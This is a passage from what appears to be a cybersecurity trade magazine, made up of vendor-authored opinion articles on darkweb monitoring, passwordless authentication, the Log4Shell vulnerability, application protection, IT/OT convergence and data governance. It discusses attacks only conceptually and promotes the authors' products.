affordable refurbished devices, to an “as new” standard. Wisetek Store is

part of the greater Wisetek group, with over 14 years’ experience in the

industry, supporting some of the world’s largest IT companies with their

used and excess IT equipment. Wisetek also operates a strict Zero-

Landfill policy and are committed to the principles of the Circular

Economy.

Eloïse can be reached online at linkedin.com/in/eloisetobler and at our

company website https://www.wisetekstore.com/.

103

Acquiring Actionable Knowledge Through

Collaboration

Why sharing experiences is critical to the success of cybersecurity

By Nicole Mills, Exhibition Director, Infosecurity Group

The world is quickly waking up to the true threat of cybercrime.

Cyber incidents topped Allianz’s latest Risk Barometer for only the second time in the survey’s history,

with ransomware attacks, data breaches and major IT outages worrying organisations even more than

business and supply chain disruption, natural disasters, and the COVID-19 pandemic.

Gartner shares similar insight, identifying the threat of new ransomware models as the top concern facing

firms in its Emerging Risks Monitor Report released in the third quarter of 2021, while the European Union

Agency for Cybersecurity (ENISA) has named the present day as the “golden era of ransomware”.

The consensus is unanimous. Right now, cybercrime is rampant, and 2022 will be a critical year for firms

in turning this increasingly dangerous tide. It is fair to say, achieving this will be easier said than done.

104

On an individual basis, organisations can acquire more tools, technologies and skills in order to reinforce

their defences. However, without a sound understanding of the threats of the modern day, such

investments may risk being either low in impact or redundant.

It is for this reason that conversations are required.

Cybersecurity is a dynamic discipline, and the opportunity to learn directly from those with real-world

experience of overcoming challenges and managing high pressure situations is not to be missed.

Every single individual in this industry has different background, knowledge and expertise covering a

phenomenal range of topics, from personal resilience to geopolitics on a global scale. Perhaps our

greatest attribute lies in the fact that we’re a collective of diverse thinkers – yet this thinking cannot and

should not be siloed.

The sharing of knowledge and experiences is vital to inspiring and enlightening, providing actionable

knowledge and fresh ideas to innovate effectively.

Different perspectives provide opportunities

As Exhibition Director of Infosecurity Group, I am in the privileged position of being able to gauge the

thoughts and experiences of some of our industries brightest minds, each of whom have a different

experience and story to tell.

Events such as Infosecurity Europe which will take place from Tuesday 21-Thursday 23 June 2022 at

ExCeL London, provide an opportunity for such specialists to come together and discuss critical topics

of the moment – something that will be particularly relevant for 2022 given the current threat landscape.

The pandemic placed renewed importance on collaboration, deemed critical in sustaining the productivity

and morale of suddenly remote teams. Yet organisations are equally beginning to wake up to the need

to look outside their own four walls.

Government professionals will have different perspectives to thinktanks, who will have different

perspectives to industry executives, and so on. It is why I anticipate a host of different discussions taking

place at such events over the course of this year.

I’ll use Infosecurity Europe as an example. Here, Baroness Eliza Manningham-Buller, the former Head

of MI5 now serving on the Lords Select Committee on Science and Technology, has opted to talk about

Leadership in an Age of Uncertainty, discussing the qualities needed to face so many threats in the world

today. Meanwhile, James Lyne – CEO of Helical Levity – will be looking at how Hacking Really Works,

discussing how cyber criminals operate in the real world and providing hands-on demonstrations of

attacks.

105

Both are equally important topics, yet both are perhaps entirely alien to the other.

Another example can be found in Misha Glenny’s participation. An author, journalist and specialist in

organised crime and cybersecurity that has acted as a consultant to European governments and the EU

on the Balkans, and advised the US departments of State and of Justice on US-European relationships,

he will be offering insights into the challenges geopolitical tensions are creating across the tech sector.

Meanwhile, Professor Keith Martin – a Professor of Information Security at Royal Holloway, University of

London, and Director of the EPSRC Centre for Doctoral Training in Cyber Security for the Everyday –

will explain how cryptography is used today, highlighting the security benefits and pain points.

Of course, there are many ways in which we can foster greater industry collaboration, this event being

just one such example. Be it face to face conversations, webinars that encourage open debate or other

means of promoting discussion, greater cooperation of all kinds will be critical to ensuring that

cybersecurity teams are able to bridge the ever-growing gap with cybercrime.

From key threats, security-first cultures and new models such as ransomware-as-a-service to the historic

and changing approaches of cybercriminals, third party risks and improving detection of known and

unknown threats, we operate in a sphere that truly feels like it is boundless.

Indeed, there will always be more that we can learn – and such learnings, cultivated by the sharing of

knowledge and experiences, will be critical to ensuring that current and future generations of security

leaders can begin to mount a fightback.

About the Author

Nicole Mills, Exhibition Director, Infosecurity Group, RX

Global. Nicole Mills is Exhibition Director for the Infosecurity

Group. With over 20 years’ experience in events and media,

she has worked with many brands responsible for strategic

and commercial growth. Nicole has worked on the

Infosecurity Group for six years working with the Infosec team

responsible for Infosecurity Europe and Infosecurity

Magazine. Working with the team, the aim is to bring the cyber

community together to showcase the latest products and

solutions to enable businesses to continue to protect

themselves.

Nicole can be reached online at @Infosecurity and at our

company website Infosecurity Europe | Information and Cyber Security Expo UK

106

As the COVID pandemic rages on and threatens to delay the restoration of normalcy, organizations have

had to rapidly transition to a digital model of working to ensure operational continuity and maintain their

competitive advantage. Experts claim that the pandemic has accelerated the adoption of digital

ecosystems by nearly a decade, with companies rushing to embrace the cloud, implementing a mobile-

first strategy, and employees working remotely. Unfortunately, this progressive trend has been marred

by a disproportionate increase in the frequency and sophistication of cyberattacks, especially

ransomware attacks on organizations, large and small alike. The consequences of this include

cybercriminal groups stealing/destroying sensitive data, disrupting business operations, and further

exposing the victims to unwanted media and regulatory scrutiny.

Surprisingly, Threat Actors routinely compromise even high-profile organizations with skilled

cybersecurity staff, state-of-the-art cybersecurity technology, adequate security budgets, and

demonstrably good cybersecurity processes. In fact, in many instances, the affected organizations were

found blissfully unaware that they were breached and only came to know about it via a third party. This

fact indicates that while organizations are very good at managing “known” risks and responding to attacks

that they can “see,” they are often oblivious to the “unknown” attacks that fly undetected under their

security radar. To quote Walter Johnson, one of the greatest baseball pitchers in sports history – “You

can’t hit what you can’t see.”

Darkweb Monitoring

An Indispensable Element of Cyber Risk Management Strategy

By Kaustubh Medhe, Head of Research and Intelligence, Cyble

107

These risks are referred to as ‘unknown knowns’ (blind spots or information that the organization is

unaware of - but a potential adversary can exploit to their advantage). Organizations do have a way to

overcome this blind spot, however.

Cybercriminals have been known to frequent the “darkweb” (the hidden part of the internet accessible via

specialized browsers and networks to help preserve anonymity) to advertise and monetize the illegally

obtained information through successful cyber-attacks. This information includes stolen access

credentials (usernames and passwords) to the victim’s corporate network and business applications,

banking accounts, or sensitive personal /business information stolen during a successful malware attack

or a data breach. This information is procured by other cybercriminals who can leverage the compromised

account access to either steal funds, exfiltrate sensitive data or launch another advanced cyber-attack

(like a ransomware attack) on the victim organization.

Cybercriminals have also been observed discussing potential vulnerabilities that they have found in their

target companies on various darkweb forums.

With specialized darkweb monitoring services, organizations can become aware of such vulnerabilities

in their infrastructure and potentially compromised users or systems before their access credentials are

abused or misused in follow-up attacks. Based on this intelligence, organizations can immediately take

remedial measures such as resetting credentials, conducting a security assessment, or a forensic

investigation to identify and remediate malware or vulnerabilities to minimize or eliminate the risk of an

impending attack.

108

Leading organizations with mature cyber risk management practices have already been employing

darkweb monitoring as a critical asset in their security monitoring arsenal for quite some time. Of late,

they have also expanded the scope of darkweb monitoring to help manage their third-party/supply chain

cyber risks. Some of the key applications of darkweb monitoring for third party risk management include

1. Identifying compromised credentials of their critical third parties or customers

2. Identifying and assessing their data exposure in the event of a third-party data breach

3. Assessing cyber risk exposure of a potential M&A target as part of due diligence

4. Identifying their customer data in a third-party data breach and initiating Data Breach Notification

processes as stipulated by various Data Protection Regulations such as GDPR

5. Continuous risk assessment and cyber risk monitoring of critical vendors or business partners

based on their data/access exposure on the darkweb

As the cyber threat landscape evolves, it is no longer sufficient to rely solely on enterprise security tools

such as endpoint and perimeter security controls to safeguard organizational data. Organizations need

to look beyond the perimeter to gain continuous visibility and insight into what their adversaries know

about them and then remediate those issues before they can be exploited.

In this endeavor, darkweb monitoring has quickly emerged as a valuable tool in cyber defenders’ arsenals

- something every security-conscious organization should consider including as part of their cyber risk

management strategy.

About the Author

Kaustubh Medhe, Head of Research and Intelligence, at Cyble is a

seasoned cybersecurity and risk management professional with 20+ years

of diverse experience in consulting, practice management, and

cybersecurity operations. Before joining Cyble, Kaustubh gained extensive

experience in successfully managing security service programs and

engagements for several clients in the Insurance and Banking sector in

India, the Middle East, and APAC.

Kaustubh can be reached online at https://in.linkedin.com/in/kaustubh-

medhe-8963204?trk=public_post_share-update_actor-image and at our

company website https://cyble.com/

109

Replacing Weak Authentication Methods with

Decentralized Security Infrastructure: The Move

Towards a Passwordless Future

By Frances Zelazny, CEO of Anonybit

Recent advancements in securing online accounts have effectively changed the way many of us envision

protecting our digital footprint - with top priorities of maintaining privacy and preserving online identity

security. While transformative, these advancements are not airtight means of security.

The continued flood of identity fraud within the past few years is insurmountable. In 2021 alone, 59% of

identity fraud victims attested to total account takeover, with an approximate average value of financial

losses of $12,000 across multiple accounts per victim. With $6 billion in personal losses each year,

account takeover has quickly become the leading form of fraud loss. As such, security experts across

the industry agree that the way forward is through strengthened authentication, starting with eliminating

passwords and replacing them with more secure factors, such as biometrics.

110

Strong authentication has traditionally been synonymous with methods of multi-factor authentication

(MFA), most of which still rely on the use of a password of some kind. However, the unfortunate truth

about passwords is that they are not only inherently broken but are also the most ubiquitous

authentication factor. Therefore, any implementation of multi-factor authentication is undermined by their

inclusion.

High-assurance strong authentication is what many industry experts believe to be a much superior

approach to securing accounts, in which multi-factor authentication is merged with biometrics. In the past

five years alone, high-assurance authentication has been adopted on a mass scale, climbing from 5% in

2017 to 16% in 2018, and even more so up to a whopping 24% in 2021. With high-assurance and

biometric authentication gaining traction in the U.S., the prevalence of password dependence still exists

among 49% of users across their accounts. Despite this surprising percentage, the growing awareness

of stronger authentication methods is promising for its implementation in the near future.

As it currently exists, the widespread adoption of high-assurance authentication has largely been led by

the FIDO Alliance. Since 2013, FIDO sought to enable strong authentication through an open set of

standards and specifications that link user devices to a secure online service and then rely on biometric

information stored on a particular device. Making this process more accessible appears to be the key to

its ubiquity, but there are also loopholes that need to be addressed as device biometrics only authenticate

the device owner, not the owner of the account they are trying to access. When this gap gets exploited

by attackers, it further contributes to the growing fraud rates that we are experiencing.

There are other issues that must be overcome to move towards the ubiquity of biometrics for consumer

applications. Currently, FIDO credentials are only generated for a specific device, meaning that each

device or browser must be separately provisioned in order to seamlessly authenticate access. Managing

multiple devices is not only difficult, but from a consumer perspective also degrades the experience. As

a result, the FIDO Alliance has called for the issuance of multi-device credentials that will enable users

to authenticate from anywhere, at any time, and from any device.

The transition to this model begs a few questions, the first being: how do you establish a high-enough

level of assurance with a new user device that will allow for the entire set of credentials or keys to be

entrusted to it? Secondly, how can digital assets be securely backed up and transferred without exposing

them to potential compromise in transit or at rest whilst in vendor storage? And lastly, how does all of this

happen across different device manufacturers who are disincentivized from working together?

Because biometric information is stored and bound to the specific device, it cannot be relied on to

authenticate from any other device, meaning the biometric samples from the original device will no longer

be available, and the fallback will once again be other authentication factors with lesser assurance levels.

Additionally, sending cryptographic assets to backup facilities exposes this information to eavesdropping

by cyberattackers in transit. Finally, if a vendor’s facility is hacked into, all cryptographic keys stored can

provide unfettered access to all of their accounts.

The solution to address both of these challenges lies in a decentralized cloud infrastructure that can

provide high levels of authentication assurance regardless of the device. Applying biometrics to a

decentralized cloud infrastructure aligns with the privacy principles of FIDO, where a user is in control of

their biometric data, and the biometric itself is not accessible across multiple parties.

111

While the technology to fully realize this is fairly new, companies are working to leverage techniques like

multi-party computing and zero-knowledge proofs in ways that break down biometric data into

anonymized pieces. These bits of data are then secured individually over a decentralized network and

can be matched in a decentralized manner as well, ensuring their security both at rest and in process.

The same infrastructure can also be used to secure cryptographic assets like FIDO credentials. Sharded

cryptographic assets can be distributed over a decentralized network, and only after a user authenticates

biometrically will these assets be released onto the user’s new device.

Looking to a much larger scale, in order to make this method of authentication ubiquitous, it is critical to

move past the inhibitors for adoption. Though many still cling to outdated methods of security and identity

authentication, there has never been a stronger call to utilize existing technologies and infrastructures to

foster the privacy and security of countless users. While it may take some time to achieve on a

widespread scale, decentralized biometrics cloud infrastructure provides the framework to propel us

towards a truly passwordless future.

About the Author

Frances is a seasoned marketing strategist and business

development professional with over 25 years of experience with

start-up and scale-up companies, primarily focused on

biometrics and digital identity, fintech, data and analytics and

cybersecurity. Frances has led marketing and strategy teams at

L-1 Identity Solutions, MyCheck, BioCatch and most recently,

Signals Analytics, and has run her own business consultancy

where she provided expertise in biometrics and identification

systems to growth companies. Frances has also served

government and multilateral organizations in promoting

biometrics best practices for social and economic development

and has been an outspoken advocate for consumer privacy and

the responsible use of biometrics. Her latest venture called Anonybit, which provides a ground-breaking

infrastructure for decentralizing biometric technology (not on the blockchain!) and creates a new category

for privacy-preserving identity management.

Frances can be reached online at LinkedIn and Twitter and at our company website, First Name can be

reached online at (EMAIL, TWITTER, etc..) and at our company website https://anonybit.io/

112

As old years end and new ones begin, it’s natural to look ahead at the promise and possibility that lie in

front of us. What’s new? What’s near? What’s next?

But in cybersecurity, we already know what to expect in 2022: more breaches. Why? Because loss or

theft from data leaks has grown substantially year-over-year for so many consecutive years now we’d be

fooling ourselves to think 2022 will be any different. Even with evolving new threats and the growth of

nation-state actors in the ransomware business, we want to believe our current lines of defense will hold.

The briefest history shows us the folly in our thinking. We’re not safe. Our defenses will not hold. Period.

And the biggest gap in our defense is…us. You. Me. People. Our cyber hygiene and habits are not what

they need to be to truly protect sensitive data and information, and for the most part, the technologies we

use come with too much friction. The user experience is so poor that we spend as much (or more) time

The Password Is Dying. It’s Time for A

DNR.

By Lucas Budman, CEO, TruU

113

circumventing onerous technology and security controls than we do in building the habits and behaviors

that would reduce overall risk in our organizations.

Compromised credentials and poor access controls—both of which involve usernames and passwords—

are the reason some 15 billion identity records circulate across the dark web today. The problem has

become so critical that last year’s OWASP top 10 named “Broken Access Control” as the number-one

risk. To reverse this trend – and literally save us from ourselves, from our lax behaviors and ineffective

controls – we must look to technologies that reduce or eliminate human error by design.

Organizations the world over have woken up to the fact that compromised credentials—at the root of

more than 80% of all breaches-–are their biggest threat. In other words, awareness of the problem has

finally caught up with what the data have demonstrated for years, and we now recognize that addressing

a few key access points with passwordless options or biometric solutions doesn’t go far enough to

address the root cause.

2022 is the year to go passwordless.

Because passwords are easy to discover and exploit–and because they’re plentiful—if organizations

don't embrace the passwordless trend, bad actors will continue logging in with stolen passwords and

companies will continue to suffer breaches.

2022 is also the year to stop pretending that existing two-factor (2FA) and multifactor (MFA)

authentication tools will deliver anything more than marginal improvements to a poor security posture.

The massive levels of user friction and workflow interruption alone are good reasons to stop investing in

2/MFA because they hinder widespread adoption and use of the technology; the fact that such solutions

also do nothing to curtail phishing attacks, ransomware, credential stuffing, man-in-the-middle, SIM

swaps, push bombing, and other popular attack vectors mean organizations cannot depend on them to

secure the devices and work products of remote and hybrid workers.

We’re seeing more and more business leaders starting to prioritize budgets and fast-track proof-of-

concept (POC) engagements to find passwordless solutions that will work across the enterprise at every

access point. Successful deployments will reduce IT complexity, streamline use-case support, and offer

a seamless user experience–one that enables people to log in easily and securely from anywhere in the

world without using vulnerable passwords.

Advanced passwordless solutions are embedded in continuous authentication models that remove the

zero-sum trade-off between better security and a better user experience by allowing users to authenticate

into workstations, physical doors, and other sensing assets simply by being close to them; they also

deploy AI/ML to approximate distance from sensing objects without requiring pairing or further

interactions to work. They use behavior pattern analysis to authenticate intended users and remove

access from unintended users. Importantly, they also empower enterprises to consolidate solutions,

114

remove complexity, reduce costs, and deliver better security outcomes while supporting robust

administration tools and workflow-based execution to mitigate complicated security and access

requirements.

Beyond usability and security, organizations are embracing the maxim that continuous authentication

solutions must also be more than just a biometric alternative to passwords—and they must respect user

privacy too. Users should have complete control over and visibility into the data that are collected and

how such data are used. Modeling should be done in a privacy-preserving manner with clear, defined

outcomes, while AI/ML models should be used strictly to facilitate user authentication—not for data

collection or monitoring.

As 2022 progresses, we expect to see the removal of threats from compromised credentials to snowball

as more and more enterprises decrease unnecessary spend on IAM tools underpinned with some sort of

password requirement and spur investment in innovative and robust passwordless technologies that can

protect across the enterprise while delivering a frictionless experience for employees. Organizations that

prioritize passwordless deployments will foster more effective risk-reduction strategies, improve cyber

resilience, lower costs, and remove user strife from the equation. It’s time to act.

About the Author

Lucas Budman is the CEO of TruU. He was formerly the CTO of the

Advanced Solutions Group at CenturyLink, a Fortune 500 global

technology company. CenturyLink acquired his previous company

Cognilytics, a machine learning platform company focused on financial

risk and cybersecurity, where he was a founding member and CTO. Prior

to CenturyLink’s acquisition, Lucas was founding member and CTO of

MyCollege Foundation, a Bill and Melinda Gates funded non-profit

whose mission is to provide higher education pathways to low-income

young adults.

Lucas holds an M.S. in Finance, a B.S. in Computer Science, and an

unfinished postgraduate degree in Computer Science - all from the University of Colorado. In his spare

time, he is an avid skier, former racer and enjoys road cycling.

Lucas can be reached online at https://www.linkedin.com/in/lbudman/ and at our company website

https://truu.ai/

115

Analysing the true threat of Log4j

By Tom McVey, Sales Engineer EMEA, Menlo Security

In December 2021 the cybersecurity industry could be found reflecting on another difficult year, defined

by further spikes in both the sophistication and volume of threats used by attackers.

Following on from a similar pattern in 2020, attackers continued to capitalise on growing digital footprints

and new vulnerabilities – a trend that has only continued to accelerate since the pandemic first induced

a rapid increase in digitalisation efforts.

Amidst such reflections, Log4Shell emerged as one of the most threatening vulnerabilities facing

companies to date.

Log4j is a weak point that was discovered in the Log4j Java logging library (CVE-2021-44228). It is a

widespread piece of software typically used to record events such as errors and routine system

operations. The 404 error message that is received when clicking on a bad link is one such example of

Log4j in action, both telling the user that the webpage doesn’t exist and recording the event in a log.

Log4Shell works by abusing a specific feature in Log4j that allows users to specify custom code for

formatting a log message. The challenge lies in the fact that this code can be used for more than just

formatting log messages. Indeed, Log4j allows third-party servers to submit software code that can

perform all kinds of actions on the targeted computer, opening the door to a range of nefarious activities.

116

Ease of exploitation and HEAT

A major problem with Log4j is not just the potential to cause immense damage…. Equally, it is relatively

simple to exploit using Log4Shell.

Given this combination, the National Institute of Standards and Technology (NIST) gave it a rare 10 out

of 10 rating on its Common Vulnerability Scoring System (CVSS). With such a low bar for using the

exploit, it can be leveraged by a wide range of attackers with malicious intent.

This is demonstrated by the sheer volume of attacks that occurred once the vulnerability was made public.

With the first exploitation attempt recorded within just nine minutes, a further 830,000 were made in the

three days thereafter, prior to a patch being released.

What is equally concerning is the fact that a proof-of-concept attack using the Log4j vulnerability had

been detected eight days earlier, suggesting that the vulnerability was both known and possibly exploited

prior to this time.

Indeed, the evidence points to one outcome – that multiple attackers have successfully infiltrated various

enterprise servers through the Log4Shell exploit.

It is likely that they won't have given away any obvious sign of their successes. Instead, they will be

probing networks and identifying where they can obtain the most value – or, in the eyes of their victims,

inflict the most damage.

This is a common trend amongst attackers, allowing them to extract the most value possible from their

exploits. The infamous and devastating SolarWinds attack affecting US government agencies and

various Fortune 500 firms is a prime example, with the attackers having gained access to the company

network nine months before an attack had been identified.

Therefore, we expect to see several attacks stemming from the Log4j vulnerability to emerge throughout

the entirety of 2022 and even beyond, with Highly Evasive Adaptive Threats (HEAT) being a critical tool

in the arsenal of attackers that will enable them to conduct their works under the radar.

HEAT attacks are defined by specific techniques used by attackers to evade existing security defences.

With a full understanding of all the technology integrated into the existing security stack, threat actors are

leveraging data obfuscation tactics such as HTML smuggling and Javascript obfuscation as mechanisms

to avoid detection.

HEAT attacks present many challenges of its own to security professionals. Several HEAT attack

characteristics actually serve useful purposes, and therefore can’t be blocked altogether. Instead, work

arounds are needed to ensure that HEAT attacks are prevented.

117

Zero trust and isolation

Between Log4j being both highly accessible and potentially hugely costly, a rising tide of attackers driven

by a thriving ransomware-as-a-service landscape and the growing prevalence of HEAT attacks; the task

facing security teams is difficult.

However, there are some steps that can be taken to remedy such scenarios. This needs to start with a

shift in mindset away from post-breach detection and mitigation to prevention with a zero trust approach.

With a zero trust approach, organisations can work to stop threats in their tracks before they reach the

endpoint – something that is entirely necessary today given the evasive actions of modern attackers. It

recognises trust in a network as a vulnerability and therefore advocates that all traffic, from emails and

documents to websites and videos, should always be verified.

At Menlo, we recommend that organisations abandon traditional detect and respond approaches to

cybersecurity and implement a zero trust approach powered by isolation – a technology that ensures that

no active content from the internet is ever executed on the user’s endpoint.

Critically, this protects IT infrastructure from ransomware and other HEAT attacks regardless of patch

status. Shutting off any access to the endpoint is the only way to stop these attacks with 100 percent

certainty.

About the Author

Tom is a Solution Architect at Menlo Security for the EMEA region. He

works closely with customers to meet their technical requirements and

architects web and email isolation deployments for organisations across

different industries. Prior to Menlo Security, Tom previously worked for

LogRhythm and Varonis.

118

The expression “shift left” is rapidly becoming mainstream in discussions about IT and Software security,

but what does it actually mean? To most, it’s the principle of thinking about security earlier in the planning

stage for any system or network, or in the designing and development of software applications.

But is it far enough?

Endpoint security has been the be-all and end-all of network security for many years and yet we still see

issues, from Log4J and Supply Chain attacks to Mobile Apps as an attack surface compromising

supposedly secure API. The question for vendors and their customers is simple: are the burgeoning

billions of endpoints, driven by the IoT revolution, able to be secured, even if we all “Shift Left”?

I mean, if this was possible it would have been achieved by now, and security consultants & red teamers

could retire?

“Shift Left” is in danger of becoming a buzzword, much as “End Point” did 20 years ago. In software

development, it is clear that the idea of moving security awareness from traditionally the last thing

considered before shipping, to something every developer understands, can implement, and can act

accordingly has to be a good thing.

Part of the problem we see in the technology space today, from Automotive and Health IoT to Cloud

Services and AI/ML, has been the assumption that every component can be trusted to have been

developed securely within organizations and their supply chains of dozens of vendors. It’s clear that in

the parade of multiple Agile Developers, (DevOps, ITOps, MLOps, DataOps, ModelOps, AIOps, SecOps,

DevSecOps and who knows how many other “xxxxxOps”) blind trust has been relied upon as a business

process.

“Zero Trust” is another buzzword that may travel hand-in-hand with Shift Left, which makes some sense,

but as many are beginning to point out there is no single Zero Trust silver bullet, it’s a process. As a

process, it needs to be the default setting of any designer of any system relying on IT networks,

connectivity, or software.

The foundational issue, however, goes back to the individual “endpoints” themselves.

This correspondent has been accused of being a professional paranoiac while working in the Mobile

Security and Mobile Fintech space, and the accusation is fair. I would suggest that what we need is far

more to be similarly lacking in trust and doubtful about all the marketing and other hype.

So how should developers and analysts begin to think about answering the challenge?

Are We Shifting Left Enough

By Douglas Kinloch, VP of Business Development, PACE Anti-Piracy

119

• Secure coding so vulnerabilities aren’t created in the first place

• Use programming languages that are not inherently insecure (to run on platforms that can’t be

secured)

• Security review & source code scanning of applications before finalization

However, we have to assume every connected 5G IoT device, Medical Device or Smart Phone is

accessible to attackers. If they can reach it, they will begin to understand the Applications running on the

device and use these as an attack surface for the application itself, or worse (via APIs) the network with

which it communicates. This problem is magnified many times in Smart Phones by the simple existence

of App Stores - anyone can download apps before they reach the intended devices.

Securing the compiled applications is ever more important.

The bullets above are fairly standard and are (thankfully) now entering the mainstream as awareness

grows of Zero Trust and Shift Left, but there is another process that is missing…..

Application Protection, sometimes known as RASP (Runtime Application Software Protection), is a

technique that can protect application, and any security-sensitive code, such that the good work done in

the three bullets above can’t be undone by attackers using Static and Dynamic Analysis (or decrypt tools)

to understand and compromise applications by re-inserting whole new vulnerabilities.

This protection is applied during the development phase, before DevOps or DevSecOps groups need to

become involved, or better still with these skills evident in the development team.

The assumption that compiled app code will be accessed, and that attackers have the tools and skills

changes the security calculus completely.

Zero Trust means just that and developers protecting their code understand that the actual end-point is

not the device, or even the application within that device, but is the source code on the developers’

machine - before it’s even compiled.

So when you decide to Shift Left, as we did, ask yourself, “how far?”

120

About the Author

Doug Kinloch is VP of Business Development for PACE Anti-

Piracy Inc. . Doug Kinloch is VP of Business Development,

Europe and Director of PACE AP Europe Ltd, managing the local

company and working as part of the overall PACE Business team.

A veteran of the Scottish Tech and Start-up scene, he has over a

decade of experience working to market innovative Software

Security as applied to Financial Services, Digital ID and Content

Protection, including managing relationships with the international

and local Card Schemes and major banks.

Doug can be reached online at dougk@paceap.com and at our

company website http://www.paceap.com

121

Threats Against Critical Infrastructure Are

Looming, Agencies Must Safely Modernize

OT Systems

Amid Recent Geopolitical Tensions, There Have Been Serious Concerns Regarding the

Vulnerability of The United States’ Critical Infrastructure.

By Josh Brodbent, Director of Public Sector Solutions Engineering, BeyondTrust

The Cybersecurity and Infrastructure Security Agency (CISA) identifies 16 critical infrastructure sectors

whose operations are “so vital to the United States that their incapacitation or destruction would have a

debilitating effect on security, national economic security, national public health or safety, or any

combination thereof.” The threat of such an attack is credible enough to warrant official, repeated

warnings from the White House urging the public and private sectors bolster their “cyber defenses

immediately.”

122

Converging Operational and Information Technology

Historically, critical infrastructure sectors relied heavily on operational technology (OT) rather than

information technology (IT). Until recently, OT systems ran on proprietary protocols and software, lacked

automation, required manual administration by people, and had no external connectivity. Today, the OT

landscape is increasingly converging with IT systems. However, OT professionals and IT experts often

lack a comprehensive understanding of their counterparts, which further complicates an already

precarious union.

Convergence allows for revolutionary new capabilities and efficiencies, such as the ability for OT systems

to produce valuable data analytics. However, the shift from largely closed systems to open ones has

generated myriad cybersecurity risks. In fact, cyberattacks against critical infrastructure skyrocketed

2,000% in 2019. Vulnerabilities were further exacerbated by the global shift to remote work post-

pandemic.

The need for employees to connect remotely to OT systems from personal devices on their home

networks meant even fewer security controls were in place on the IT end when compared to traditional

corporate environments. These remote connections have blurred the IT-OT segmentation and expanded

the attack surface by providing new entry points for hackers to exploit.

The Air-Gap Argument

While some could reasonably speculate that the benefits of convergence are not worth the potential cost,

and instead argue for a practice known as “air-gapping,” in which OT and IT systems are completely

segregated and the OT system is entirely isolated from the outside world. However, in our modern, digital

world, accidental convergence is nearly impossible to maintain, and should be anticipated.

For example, electromagnetic radiation, FM frequency signals, thermal communication channels, cellular

frequencies, near-field communication (NFC) channels and even LED light pulses can expose critical

systems to malicious activity. Something as innocuous as an external laptop being used as an HMI or a

USB thumb drive used for OT purposes can accidentally converge an IT and OT system, opening the

door for serious exploitation.

Therefore, organizations who adhere to an air-gapped security model are the most at risk because they

do not implement any additional security measures. As such, convergence is inevitable, and largely

beneficial, when executed securely.

As industrial systems become further intertwined with IT, they become increasingly vulnerable. Many

have opted to use Virtual Private Networks (VPNs) to secure their OT infrastructure, but VPNs lack the

advanced security features, visibility, and scalability necessary to fully protect a converged system.

123

Protecting Converged Systems Requires Visibility, Auditing and Least Privilege

Visibility is key to any advanced, secure remote access system. It is imperative that system operators

can monitor who is accessing the network, what they are doing, and for how long they are connected to

the network. “Always-on” VPNs provide little to no visibility or control over individual user activity.

Alternatively, by restricting unapproved protocols and directing approved sessions to a predefined route,

the potential attack surface is reduced.

A thorough understanding of a system’s data makes it easy to detect anomalous events. This visibility

enables informed analysis. The ability to capture detailed session data for all remote access sessions,

and to review that data in real time, is paramount to securing an OT network. Capturing detailed session

logs creates an audit trail that enables accountability and compliance.

Of note, auditing is a primary example of how the differences between OT and IT systems management

can cause friction. To assess an IT system, operators typically use a technique known as scanning, but

OT systems do not respond well to scanning. In fact, an entire OT system could be disrupted if they were

scanned in typical IT fashion. Instead, OT systems should be queried in their native language.

Understanding how to safely remedy different practices between IT and OT systems is critical in the

process of convergence and is one of the many reasons IT and OT professionals should better educate

on another.

Converged networks should also follow the principle of least privilege (PoLP), a core component of any

zero trust architecture (ZTA). PoLP is the idea that any user, program, or process should only have the

bare minimum privileges necessary to perform its function. PoLP dramatically mitigates the risk of a

cyberattack by restricting a bad actor's ability to move laterally within a system.

Zero trust has become profoundly relevant for OT industrial control systems, as modern cloud-based

technologies have blurred or dissolved the idea of traditional firewalls and network-zoned perimeters.

VPNs permit unnecessary access for operators, suppliers, and vendors, meaning that they do not adhere

to the PoLP or zero trust. Troublingly, VPNs often store privileged credentials insecurely. To protect our

nation’s most valuable resources, role-specific access and individual accountability for shared accounts

must be implemented.

Converged systems are often more exploitable because of the challenges inherent in auditing them,

meaning that when remotely accessing OT infrastructure, a zero trust mindset is critical.

Ensure Security Without Compromising Business Goals

Converging two unique systems will always present challenges, so when bringing disparate environments

together, it is imperative to be diligent about segmentation and engineering throughout the network.

Comprehensive IT protections and secure remote access protocols should be implemented before

attaching a network to an OT system, otherwise that OT system will inherit all those same vulnerabilities,

an exploitation of which could yield seismic consequences.

124

In the process of converging the nation’s OT and IT systems, educating one another is of the utmost

priority. There is a concerning lack of understanding on both sides about the other, and if we hope to

converge our critical infrastructure successfully and securely, that must change.

The benefits of convergence are plentiful, from cost to functionality, but the consequences of a faulty

convergence are potentially severe. The process of converging an OT and IT system should be

undertaken patiently and with informed decision making. Above all, visibility and vigilance should be

prioritized, and the principle of least privilege should be followed closely.

About the Author

Josh Brodbent is the Director of Public Sector Solutions Engineering

at BeyondTrust. Throughout his 20-year career, Josh has worked with

multiple federal agencies to secure their networks and architected over

3 million user accounts in the public sector for identity and access

management solutions. At BeyondTrust, Josh leads a team of senior

solutions engineers and architects in supporting the public sector

vertical. BeyondTrust is a worldwide leader in intelligent identity and

access security, empowering organizations to protect identities, stop

threats, and deliver dynamic access to empower and secure a work-

from-anywhere world. Our integrated products and platform offer the

industry's most advanced privileged access management (PAM) solution, enabling organizations to

quickly shrink their attack surface across traditional, cloud and hybrid environments.

Josh can be reached online on LinkedIn and at our company website https://www.beyondtrust.com

125

Welcome To the Datagovops Revolution

By Ani Chaudhuri, CEO, Dasera

Sales has SalesOps. Marketing has MarketingOps. Engineering and Security have DevOps, DevSecOps,

and SecOps.

It’s high time for Data Governance to have DataGovOps.

Revisiting Data Governance

First, let’s make sure everyone’s on the same page with respect to Data Governance. According to

Google Cloud, Data Governance is (with added emphasis):

…everything you do to ensure data is secure, private, accurate, available, and usable. It

includes the actions people must take, the processes they must follow, and the technology that

supports them throughout the data life cycle… Data governance means setting internal

standards—data policies—that apply to how data is gathered, stored, processed, and

disposed of. It governs who can access what kinds of data and what kinds of data are under

governance.

126

Data Governance: It’s Everywhere but Nowhere

Data Governance is everywhere. At the same time, it’s nowhere. Here’s what we mean.

Every enterprise collects data. As such, every enterprise has a Data Governance function. Whether or

not it’s formally called Data Governance or has employees with “Data Governance” in their titles is

another question. In most large organizations, the Data Governance function is distributed across multiple

teams, including:

⚫ Security

⚫ Compliance

⚫ Privacy

⚫ Data

⚫ And maybe a few others

Even though Data Governance is distributed across all these functions, Data Governance is often a part-

time role, rather than a full-time dedicated role or team. For example, there are relatively few

professionals dedicated to Data Governance. A few cursory searches on LinkedIn reveal:

